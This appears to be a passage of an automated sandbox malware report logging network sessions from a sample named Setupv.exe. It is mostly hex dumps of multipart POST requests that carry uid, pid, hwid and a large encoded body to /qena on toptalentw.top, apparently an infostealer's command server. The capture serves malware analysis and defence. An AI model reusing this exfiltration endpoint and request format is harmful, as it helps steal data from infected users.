                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: ff da f7 25 37 2e 22 76 56 b2 36 2f ee 4d 4f f1 b5 9e c3 e1 22 27 7f 81 9a ad 7f de 7d 80 8d 1a a4 9f 8d fa 75 a8 d6 fc 4f e7 d5 01 b6 7a bd 5f b7 6c a8 35 1e b9 07 02 39 fe 2f 84 14 cc 4d fc 5f 09 85 5e 92 27 0f df f4 3e c4 de a7 36 04 58 92 64 ed c5 03 08 d0 94 a9 11 a5 7d e7 d7 47 82 da 02 00 82 62 b3 a6 f1 41 ca 2b 3c 71 57 b4 ff c1 8f ba 1a d0 4d 7b db 7b bd fe 25 94 19 46 3e 51 cc 8d b3 07 2b 43 23 72 c4 ca 24 61 ec 18 dd d7 f9 35 aa a6 c7 89 f3 5c 90 82 1a b2 07 34 b4 4a ba ad c8 54 66 29 80 4f a5 33 9f 84 5d b9 93 fa 35 da 5f e4 e4 ce b1 e0 2e c8 c9 a7 44 a5 be a4 f8 94 5c f4 e8 38 6b 7a d7 77 25 43 ea 90 24 c4 8a d8 cb 4d 57 85 03 c2 c3 25 4d 2f 97 23 ff 65 36 dc 50 25 72 47 6a 93 f1 5e a2 8e ec 2d f9 0a e8 1e 42 2f 36 0e 4d 91 8a 26 82 21 be 36
                                                                                                                                                                                                                          Data Ascii: %7."vV6/MO"'}uOz_l59/M_^'>6Xd}GbA+<qWM{{%F>Q+C#r$a5\4JTf)O3]5_.D\8kzw%C$MW%M/#e6P%rGj^-B/6M&!6
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 14 38 8a 9b 55 01 d0 5b d9 09 0e f8 4c bc 9d d2 6b ea 19 b4 5c 83 e6 6b e0 0b fc 1b 8f 13 f9 92 89 3f 3b 13 c4 04 7b 61 65 59 f3 ac 76 15 ca 22 cb 6e 2b 94 7b c7 b4 24 eb 8f 1c e5 0f 9d fa 63 d8 9a 1d 2a 43 61 65 27 35 82 f1 9c c8 97 ec e6 6b f1 9e de 6f e6 11 73 2e f0 02 c8 b2 4c 51 76 77 35 84 68 32 6e 5b 64 d5 6e 79 70 c9 89 11 43 70 ed ae 99 d2 b0 26 23 d6 a2 dd c7 72 78 cf 3d 0b 75 1f b4 8f 2e 4c 08 65 36 f9 59 c5 72 64 df e0 6e cc 7b 5b 02 3c 8d 36 8d 43 8a aa a4 23 d0 5b 23 82 30 fb 30 29 96 69 46 fc e8 4e 65 94 28 e8 b0 71 9e a2 75 70 bd 66 35 c5 0a e3 d1 53 c0 13 c3 4f 2a 6f 41 af e5 0d 06 f4 85 13 05 14 e0 2d b5 01 97 ad 0c f5 a6 c6 90 98 b1 1b cb a3 11 c2 2c 7b 53 fa 07 b1 e1 03 c8 6b 18 bb 03 5f c1 03 c6 10 1f 4b 3a 62 ad a6 ec bb 97 74 18 de
                                                                                                                                                                                                                          Data Ascii: 8U[Lk\k?;{aeYv"n+{$c*Cae'5kos.LQvw5h2n[dnypCp&#rx=u.Le6Yrdn{[<6C#[#00)iFNe(qupf5SO*oA-,{Sk_K:bt
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 7a 10 bb 5b 93 e2 7e 39 e1 8e 4a ce b8 cd 5e fd 75 f6 61 6a 7a 95 23 22 40 82 ef 50 0d 7f 1b 85 59 ea db 15 47 a0 8f 79 46 eb a0 e9 67 ad 75 1e 35 4f f6 21 f7 f2 4d c1 42 f1 b4 09 3e ea c9 7e 72 27 40 dd e6 b8 95 35 77 66 52 8d 2b 2f 5a 76 df 51 27 93 79 a5 ce eb 61 f4 9b 76 c4 e9 5b 6a ee 84 5e 2d ec 1e 99 d9 9f e4 9b be 96 df 84 67 7b b3 f3 aa 5d dd 36 a8 da a4 35 e7 fb d3 49 5d 23 8d 69 92 f1 2f 96 85 7e 6b 11 d8 41 1c d1 ab 61 d0 80 28 4e e3 b3 07 51 70 f5 18 22 2f 8e 93 23 02 d7 69 e2 47 7e 09 cf c6 86 87 45 18 55 f5 82 9f 7e 20 49 dc ea 78 04 ce 1d e7 45 c3 c8 e2 eb 2e 38 62 55 fb d9 28 20 dd 9c 49 b6 4f f2 32 4b 04 f2 81 b1 0f f3 76 18 f9 9f 1c 5b c0 6d d7 ef da ab 8f 68 f0 d8 49 da 1b ea 59 5a 15 d7 30 23 c5 8c 10 48 74 5d 14 92 13 4b 51 53 28 1f
                                                                                                                                                                                                                          Data Ascii: z[~9J^uajz#"@PYGyFgu5O!MB>~r'@5wfR+/ZvQ'yav[j^-g{]65I]#i/~kAa(NQp"/#iG~EU~ IxE.8bU( IO2Kv[mhIYZ0#Ht]KQS(
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 4e b9 33 08 71 e4 e7 f9 40 e8 78 73 4b 0b 0b a1 51 06 01 a1 2f a3 e4 05 97 32 aa 63 e8 42 48 9c 0d 54 e3 1d af 41 18 af d4 71 b1 7e a7 08 2f 64 8c 29 12 a3 47 72 f8 a5 42 7d 8b 77 50 95 12 d9 c7 02 7d 25 18 6b 33 f4 81 c8 e4 48 65 fc f6 88 e3 70 0e 2f 72 bc f3 91 de b5 14 26 71 3d 54 a3 94 56 f6 ea 48 0a 57 53 38 dc 95 42 9b a1 ed 2e c2 ae 6e 84 c9 9e d6 51 99 c5 ae 78 7f c6 75 fd f7 cb bc 62 59 7d e8 87 a9 2f 8a f0 60 fb de fe f2 fa 23 62 ab 95 ec 3c f9 46 4a 81 7a 93 76 fb 81 50 85 a9 ba d3 7b 6f 9f cb 1e d2 cd 3a 9b 91 cf b4 95 2a a8 79 70 bc 3c e5 0f 68 fb ae e3 93 a7 da ca 6a d9 0e f7 9d ba 37 37 54 02 98 08 0a a7 7a fc e1 f5 c0 84 0f 2e 9a 05 ca 28 a9 06 ea d7 b7 c8 e0 f8 bb 1b c9 d1 89 7d 69 e3 3f ea 3e 56 f1 05 35 3a 4e fa 52 cf e4 d3 5b 24 de 80
                                                                                                                                                                                                                          Data Ascii: N3q@xsKQ/2cBHTAq~/d)GrB}wP}%k3Hep/r&q=TVHWS8B.nQxubY}/`#b<FJzvP{o:*yp<hj77Tz.(}i?>V5:NR[$
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 3a 8c 0d 9f e7 bc 0d cc 16 47 87 68 f6 57 6f 25 97 a3 98 6d f0 be 63 c9 e8 fc 52 2b 7b b1 00 31 73 2a e8 68 2f ab fd 7c f4 8c a6 78 06 21 8b 25 b8 43 c1 b7 d8 05 df 79 8c 40 80 b3 c5 e9 75 79 66 ff a7 10 56 67 f1 f3 12 88 70 3b a5 3a 5d af 8a d0 3e f3 57 e7 b1 b8 6e c9 bd 59 c9 80 23 02 03 03 1c e3 ee 9d 19 ff a4 a8 dc ab 5b 99 2f 4e 2b e8 6d 98 86 2b db 6d 8c de 6a 03 39 6d 19 e1 68 a8 d5 c7 38 97 e5 a4 c3 ba cb 6f 42 7c 05 7f 18 d3 69 c1 a4 89 16 7c 67 a8 a7 9b 40 b8 02 cb 4e 04 53 45 c0 46 02 9c 71 a9 a7 9f fe bb 67 3d d2 29 c1 91 de 90 32 f0 2e 60 35 2e bf 95 91 13 9c 53 e2 2d a7 14 79 21 99 00 40 f2 e4 06 99 0e fe 4b b5 58 76 41 5f ec c7 6c 2b a7 14 9c 09 c4 9f 3f 37 ec c0 c3 bd 29 e5 fd 23 74 90 73 c7 94 f3 e6 68 de 47 bf 5e 1a 27 b5 fc 5f d6 48 72
                                                                                                                                                                                                                          Data Ascii: :GhWo%mcR+{1s*h/|x!%Cy@uyfVgp;:]>WnY#[/N+m+mj9mh8oB|i|g@NSEFqg=)2.`5.S-y!@KXvA_l+?7)#tshG^'_Hr
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 3f 96 6b 09 63 55 5b 4d b5 f3 d0 5f 0e f7 c1 9a 77 86 b5 8a c1 ca 79 c0 7d 6b d5 e6 26 3b 44 59 b4 69 40 33 30 db 1c f8 94 e3 af 1e 2d 70 27 9f ca ee 3c 7b 87 06 b1 63 da 18 eb f5 2a 3d b7 12 a8 37 3c 6d 50 79 25 4c 75 c8 cc 9b b6 a4 8a d4 b3 a1 8a 1a 7f 10 dd bf 28 26 5f f0 7a f7 ff 35 56 b8 e4 c3 6e 2c 1f df 9c 9b a6 29 2f 83 36 8d ef fd fd 7d a3 14 99 29 62 40 ba ef 70 1c bb 66 9e 76 f9 d6 12 9c 02 fd 8d c8 84 84 95 4a a7 b4 0b 69 51 70 a2 ca e6 1b f4 fc 40 ab 5c 0b a7 5c 6a d4 87 44 d8 5b 86 b6 8d 5e eb 17 22 d6 09 f3 2e 5f 8d 40 11 8a bb 04 62 69 9c 09 40 95 72 0a 12 ff 12 ad 63 31 32 d1 48 9a 86 89 77 ff 71 65 16 ba a1 8f f0 a2 c7 d5 bb 4f 94 c2 ea 8a ae e2 82 75 63 19 2a 6e ef 3b 3f 63 13 b6 20 43 8d 65 36 ac e3 79 ab ea f6 b5 a5 7c 1c fe 25 0c da
                                                                                                                                                                                                                          Data Ascii: ?kcU[M_wy}k&;DYi@30-p'<{c*=7<mPy%Lu(&_z5Vn,)/6})b@pfvJiQp@\\jD[^"._@bi@rc12HwqeOuc*n;?c Ce6y|%
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 3a b3 f3 97 38 6e 13 89 0a 53 fb 04 c2 18 6b 31 e0 64 17 66 75 ea 26 5b 4d ae d6 f8 d1 01 f0 40 31 76 00 b2 c3 3d 28 88 4c 07 d9 ed e8 98 d0 90 cb d9 67 59 f4 94 a1 91 7e cd 59 04 f6 c6 9b af 7a 10 29 78 b2 95 7b 7b 95 f6 d1 02 fa f4 f7 c7 e7 43 84 96 49 50 0c be c5 ef ec 5c bb 36 87 fe 7c ad d7 cb 2d 00 72 1a 79 00 a2 53 17 a1 5d 9c 95 0b 3c 25 51 81 16 ae c5 1a da 46 ce 32 31 66 c5 63 38 f9 ef cf 05 3f 37 9a df c6 76 a4 e9 82 91 b2 bc f4 c5 a7 f9 e7 f2 9f 74 b3 2c eb 32 18 30 cc f1 98 50 f3 a7 ec a4 8a 34 70 cb 8c 62 fd 80 55 82 36 10 28 a9 24 e3 47 82 b1 04 e6 f4 02 dd 78 0c dc 17 11 05 b6 51 a4 af 95 eb e4 c8 bf bb c5 2a dc 8b 8e 21 e2 16 e8 ab 8b 1f 9c 8b 6e 6d e4 92 51 d1 d0 ac cd 13 3c 82 39 37 ed 16 c1 10 bb b3 16 5f ed 50 80 12 13 eb f5 ca 5b c9
                                                                                                                                                                                                                          Data Ascii: :8nSk1dfu&[M@1v=(LgY~Yz)x{{CIP\6|-ryS]<%QF21fc8?7vt,20P4pbU6($GxQ*!nmQ<97_P[
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: d3 58 85 c3 6a 9a 84 fc ec c2 0f c3 dd 0f 64 db 37 65 69 65 0a 37 5b 4b 8f 30 a6 98 35 8b 9b 70 36 d3 66 03 ed 8c aa e3 e8 25 e9 14 37 9a d2 d1 4e 3f d8 2c 48 57 0e 9a 97 2b 78 83 ee df c7 a2 ea f4 a2 f8 3c 70 d1 66 23 ee f8 12 6b be c4 44 f5 8f ff c0 44 f2 5f 05 76 1e f4 7b ec 0c 0f 6b 82 d7 2a e9 37 83 11 13 61 ef 75 7c a1 3a ac eb 31 a2 03 0f 3a 72 dd ea 4c b8 7e 6e 95 43 56 31 f1 d0 55 88 46 cd 33 8f dc a5 39 9d 77 ea a9 16 69 b8 25 a9 c1 b4 49 c5 ae bb 6f ab af 3c be a7 df 91 a5 9e 05 99 f4 8b bb 65 27 b8 6e 40 85 72 b3 83 1c 5e 9f 79 41 d0 35 16 67 f6 0a 10 60 ea 32 dc 3b 4d db 85 b3 a6 1b a1 56 2c a7 7b 01 f3 f7 fb 26 00 fc c7 75 6d d3 4f 47 03 f3 34 6a ca 3e 05 f2 5c 88 ea 84 5a f5 b7 3f 6a 54 05 5c 60 30 39 c8 e2 c0 16 6a 75 30 b6 1a 4f 76 3d 6e
                                                                                                                                                                                                                          Data Ascii: Xjd7eie7[K05p6f%7N?,HW+x<pf#kDD_v{k*7au|:1:rL~nCV1UF39wi%Io<e'n@r^yA5g`2;MV,{&umOG4j>\Z?jT\`09ju0Ov=n
                                                                                                                                                                                                                          2025-04-28 17:34:57 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:57 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 937850346a764665-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          Content-Length: 70


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.549702104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:59 UTC281OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=M09Efv1f20zz1AhfYCv
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 2401
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:59 UTC1460OUTData Raw: 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69
                                                                                                                                                                                                                          Data Ascii: --M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="pid"1--M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="hwi
                                                                                                                                                                                                                          2025-04-28 17:34:59 UTC941OUTData Raw: 52 be 1c a7 b8 f3 7b 1f cf 26 17 aa f2 2e 9b 0e 1a 21 0c bf 51 c0 1c d2 5a a9 39 ca ce d5 08 0f 0f 4b 09 04 dc 9e fa 92 ef 39 c7 9e fc 09 43 75 20 c6 ee be 05 bd 80 b5 15 66 fe 56 01 a9 86 93 34 70 28 dc 86 84 0c bd 8e 9b e6 db 2c bb fe 7d 19 91 4a f3 86 17 20 93 9f 81 c5 38 cc dc aa 08 5d bc c3 0b fe 2b f9 74 29 02 99 74 e5 4e 55 bb db 37 4a 8f 22 34 93 f0 fd b8 66 06 e5 ea 37 1a 51 28 4a 37 a8 ff 74 84 d8 86 cd cf 98 46 fc 9f fa e7 63 2a f7 ff 81 45 2c 6a d4 bf 2c a1 4a 8c a5 aa 8f 7e 45 1b 2b 76 b0 ab 48 a2 18 f7 5b fd 0a 85 51 d5 d5 ae 03 6a e6 6f 34 eb 84 c3 26 19 3c 5f ca aa dd 57 03 54 e3 65 b6 1a 42 93 c6 1a e0 a6 5e 90 70 fb 18 32 c4 03 a1 0e a2 61 dc af 2b f0 d9 a5 d8 13 ab d1 60 c9 6d 76 a3 2a 4f e3 26 1e b0 d6 39 35 a1 ee b5 b5 4a 98 b5 64 03
                                                                                                                                                                                                                          Data Ascii: R{&.!QZ9K9Cu fV4p(,}J 8]+t)tNU7J"4f7Q(J7tFc*E,j,J~E+vH[Qjo4&<_WTeB^p2a+`mv*O&95Jd
                                                                                                                                                                                                                          2025-04-28 17:34:59 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:59 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 93785044cb5d4662-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          Content-Length: 70
                                                                                                                                                                                                                          2025-04-28 17:34:59 UTC70INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d
                                                                                                                                                                                                                          Data Ascii: {"success":{"message":"message success delivery from 173.244.56.186"}}


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.549703104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC277OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=2I9UW0E70hbAb
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 590349
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 30 44 37 34 42 30 33 41 43 30
                                                                                                                                                                                                                          Data Ascii: --2I9UW0E70hbAbContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--2I9UW0E70hbAbContent-Disposition: form-data; name="pid"1--2I9UW0E70hbAbContent-Disposition: form-data; name="hwid"E20D74B03AC0
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 0f 57 7d 20 55 e2 fc c1 98 00 9a d8 a7 b9 73 bd bf a4 99 00 c1 2b 4d 20 84 04 39 ea 5f 83 5c 1a 1c 78 f4 6d ec d4 bf 2a 57 c5 86 37 13 91 d7 4c fe d2 6f df 68 6e 55 a5 39 da c9 34 25 9a ea 70 61 e2 ad f0 b3 6d 8d 05 7b bd 44 83 80 1c f4 65 f8 fb 4f 22 db ab fa d4 59 b1 6f 30 fd 51 f5 99 6e 62 a3 7f db 7b 69 90 a7 7c e4 25 bc 78 45 45 40 2b 39 51 f5 19 45 7c e9 16 98 a8 f0 d0 8b 23 fb bf 09 51 f1 a7 9d e1 d0 0a 5a c4 d7 fc 0c 2c 6f 32 74 0b 09 06 a1 c3 9e bc b5 72 1d f1 44 0b 79 b8 02 c9 b9 9b c1 25 0a dc 9b 2e 1e 56 1f fc f4 10 a0 eb 51 a7 7c 7d 39 df 7a 3f 6e 5f 5f 29 64 8b ee c8 7c cd 64 bd 64 db d8 12 2f 5e d9 04 11 90 fb c5 dc b1 b7 df 48 d2 55 ac 16 c2 17 30 a8 50 2d 7e 1c ca d2 58 ed 9c 6d 90 da 3d 12 3d cd 53 52 51 8c 2e c3 d6 48 a2 b9 ed 67 0d be
                                                                                                                                                                                                                          Data Ascii: W} Us+M 9_\xm*W7LohnU94%pam{DeO"Yo0Qnb{i|%xEE@+9QE|#QZ,o2trDy%.VQ|}9z?n__)d|dd/^HU0P-~Xm==SRQ.Hg
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 1f 66 64 ad 28 91 47 e7 cc 93 87 ab 56 1e 9a 85 90 74 db 23 3b f9 8a 04 16 34 f3 22 c0 c8 56 eb 21 6f fa 9e 3d 62 e1 fe 16 64 5a 20 d9 ff 82 15 7e 84 a7 e3 3c 88 f2 e8 21 1a 83 77 29 f7 86 23 a0 ed 91 1f 5b bf 81 02 ee 10 38 6e 34 93 e2 b0 cd 2e 43 b8 4d fd 72 85 66 2a b0 1a 92 2c 9b 52 b8 e2 83 ff 09 4d 0f bb 46 e4 1e 04 26 fc 65 91 76 19 16 ed 82 87 48 7b cf a4 33 d5 4d 4f b7 d2 e1 70 cc 8e 89 f5 62 88 7e 92 6f 76 8d 4f d0 99 fd 8f b7 af 0b 6e 03 d5 2c 52 d3 9e b6 0e 2e cf 92 8a b5 48 af a4 4a 0f 59 5c 87 4a ae d2 a9 09 ef 36 c4 8f 99 9a 44 51 3d d2 33 67 ec 7f 35 f4 c6 fd 3f 7e d4 4b 89 a4 89 2d 8f 3f fa be fc 18 e2 b3 1c f1 51 0f 00 40 97 8e ed 18 7f 85 70 49 08 08 dc 93 9e 1d d0 c0 9d 24 35 a1 6e c4 21 f3 f3 6f 24 ae 61 ea d4 9b 08 23 18 f3 60 40 4b
                                                                                                                                                                                                                          Data Ascii: fd(GVt#;4"V!o=bdZ ~<!w)#[8n4.CMrf*,RMF&evH{3MOpb~ovOn,R.HJY\J6DQ=3g5?~K-?Q@pI$5n!o$a#`@K
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 3a 54 55 1c 48 27 14 6b a3 9f 5c a5 fe 31 c0 d4 ed be 9a 74 8c 8c 10 d3 5f ce c2 08 5f 1e ff ba f7 a8 2c 2c 99 6e ef 71 45 d6 50 26 27 6e a1 4b 45 dc 07 46 fa ff 00 5f 55 5b 49 06 60 8d 59 5e f8 da 18 30 f0 54 1b 0e 61 0f 12 ab 24 bb 4a b7 f8 ef e4 be d4 f4 f7 3b cc dc f4 01 68 12 db dd 25 06 80 15 d4 2f 2f 8f a4 34 4a ee 70 dc 34 68 af cf f8 7c 87 fb 71 b6 47 3a ca 34 c2 08 27 82 78 96 95 06 ec 74 c2 e1 39 be ea 69 b4 6c df ae 7d cc 8f d4 76 6a 81 58 56 76 ef 95 3c f3 c4 18 b4 67 20 c1 ca 69 a4 50 2f 06 6f 00 aa 5f 4b b1 bb da 41 a6 49 a8 6f d5 8c 93 9b 90 89 dd e8 ce fa 02 43 09 58 4f 88 91 e7 ed 00 a6 0e d8 73 d1 13 e3 e2 3c 17 3b 2b be 66 a4 00 ef 08 64 08 8f 30 16 66 10 15 69 e8 23 a7 4e 28 e7 17 e8 10 d8 32 ca 9a 1f d0 f7 93 e6 cc c1 60 7b 12 75 9b
                                                                                                                                                                                                                          Data Ascii: :TUH'k\1t__,,nqEP&'nKEF_U[I`Y^0Ta$J;h%//4Jp4h|qG:4'xt9il}vjXVv<g iP/o_KAIoCXOs<;+fd0fi#N(2`{u
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 47 74 c4 39 04 e0 21 c0 a6 a4 2e 78 02 72 ea e2 76 7d 5b fe 6c 38 bd f9 17 50 a9 94 f6 52 87 48 73 1f a4 a7 d8 94 30 77 e1 06 a5 f6 55 ec ad 5c fe 35 e1 b0 25 1e 56 86 c3 10 de 93 a4 cd 30 a6 f0 79 62 9d cb d1 5a 67 e5 88 39 e3 3a f3 25 e1 07 99 d9 79 ea 7a bf 0f d2 81 29 63 41 cb 47 d1 c5 9a 73 cb ec dd e6 a1 8f 09 ec 2a 9c e2 e9 a3 9e 0e 55 8d f9 23 06 73 76 50 db 4c 17 fd 08 41 c4 bc 22 07 6d cf 51 5b 78 4e 26 a0 a3 21 60 dc 34 61 1d f5 e5 3a 94 37 a0 69 04 0f 43 9c 00 4f da b3 67 4b 05 fd 5a 91 46 1c 12 ef 20 6f dd 88 02 28 20 ac 76 b5 eb bd 6a 2b 9c 74 e5 da 22 ff a9 bb 80 74 65 22 9c cf b2 63 bc cf ed dc 51 d0 a1 bb 98 88 75 00 03 55 54 cf 64 df 69 1c ff a0 a3 28 75 8f 9f 33 b6 21 3b 82 28 2b 42 0b 4c e0 d5 48 16 e7 cd 08 11 4b f0 05 51 9c 72 fa 9a
                                                                                                                                                                                                                          Data Ascii: Gt9!.xrv}[l8PRHs0wU\5%V0ybZg9:%yz)cAGs*U#svPLA"mQ[xN&!`4a:7iCOgKZF o( vj+t"te"cQuUTdi(u3!;(+BLHKQr
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 51 64 cc c9 24 cb 41 d8 f0 e0 00 55 3e 64 28 80 5f 3b 0d f9 1e de ad 47 60 e6 30 5d d7 0c b5 70 44 2a aa aa a8 a0 66 23 90 da 3c bb ba 7f b7 74 79 5a 59 b5 3b 24 ca 26 aa 67 b9 e6 10 4d b2 51 36 53 8c c3 ba b0 94 3a a3 92 71 c4 a3 89 ff 66 38 1a da 62 66 f2 1b ac d8 ef 52 81 f1 b9 c8 54 a2 18 ca 7f 31 73 16 3f 19 46 e8 ad c9 43 e3 3b 0c 5b 77 b2 f7 b4 64 74 55 95 13 35 b6 06 23 dd e0 00 d2 51 71 9b 21 41 36 dc 51 b9 77 3f 84 5a 81 b5 7e 85 21 0e 87 4f a6 af ed b0 f3 fc af 9b 83 b4 09 57 a9 61 7c b5 2c 39 7f 60 42 ee ff d8 61 d4 31 3a fa 51 a4 76 bd 7c ff 14 33 e0 09 fc 56 4a a3 73 5b 97 3a f0 f1 af 45 3b 8b f7 e6 b4 7f 42 f1 d8 05 d5 f6 79 3c 2c d4 86 75 a4 c3 c8 b6 0c c7 1c 2e 0f 4a 81 1e 27 84 ad b4 dd 27 50 a7 29 e4 ca 56 6a 7a 56 16 b1 8f cb 2c 98 84
                                                                                                                                                                                                                          Data Ascii: Qd$AU>d(_;G`0]pD*f#<tyZY;$&gMQ6S:qf8bfRT1s?FC;[wdtU5#Qq!A6Qw?Z~!OWa|,9`Ba1:Qv|3VJs[:E;By<,u.J''P)VjzV,
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: f7 04 3b 2f fc 5d ca 8c c7 18 f2 af d0 7c c6 e2 da c3 e1 62 f0 f2 e4 ea f4 47 23 4b 72 0c f0 73 ba a0 8c 4e b2 1a 6c 95 c5 fa 79 eb 5c 2a e9 3e b5 7c 5a 3e 99 64 b9 bf d2 33 21 72 c9 6a c0 71 16 36 b4 ae 0f 25 89 7d 2c 93 3f 04 fb 07 c9 de 99 a4 ca 05 88 5a 2f 7a 1f 66 2c fc ea 9a d6 c6 79 79 ab c1 1d d9 62 1d cc 02 1d f4 8b 2d dc 09 83 72 70 15 2c 08 68 b2 05 34 34 e5 2e ea 90 da ba 14 82 a4 cd b6 06 3d 47 46 a5 bc d2 d1 92 c4 e9 cf 2a 4a 3f 0e ad 6a 35 e0 f8 02 7b 70 e1 a8 da 17 d2 1b be b1 26 75 73 51 46 04 0b 48 72 d6 0a 33 2f e0 ee 8c b7 75 b2 8c 69 8c ca 63 b7 27 a8 70 df b2 76 fc f2 95 56 78 c0 1a 70 63 5d 8c a6 57 81 15 f1 44 b4 0e 28 8b 84 4b 8d 54 18 27 ab 05 bc 3a 3e 17 5c 6b c8 00 77 6d 3d 79 ea 91 97 fe 21 af d4 cd d2 c4 b0 d7 65 57 8b cc 82
                                                                                                                                                                                                                          Data Ascii: ;/]|bG#KrsNly\*>|Z>d3!rjq6%},?Z/zf,yyb-rp,h44.=GF*J?j5{p&usQFHr3/uic'pvVxpc]WD(KT':>\kwm=y!eW
